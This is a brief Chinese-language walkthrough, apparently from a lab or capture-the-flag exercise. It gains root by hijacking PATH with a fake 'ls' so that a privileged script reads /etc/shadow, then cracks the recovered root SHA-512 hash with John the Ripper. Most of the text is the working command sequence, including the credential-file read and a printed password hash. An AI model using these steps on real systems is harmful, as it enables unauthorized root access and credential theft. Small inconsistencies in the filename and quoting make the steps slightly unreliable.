通过读取密码文件shadow来破解root用户的口令实现提权

通过读取密码文件/etc/shadow来破解root用户的口令

ls -l /etc/shadow 普通用户无查看shadow权限

echo "cat /etc/shadow" >/tmp/ls
​
chmod 755 /tmp/ls
​
export PATH=/tmp:$PATH
​
/home/user5/script

看到了root密码信息，第二部分为root密码hash

接下来对root密码进行破解

hash密码破解工具hashcat

john密码破解工具 （默认字典文件）

echo "root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1" > hash .txt

注意要用单引号！

使用john破解：

root采用了弱口令，密码为12345

显示破解的密码john --show hash.txt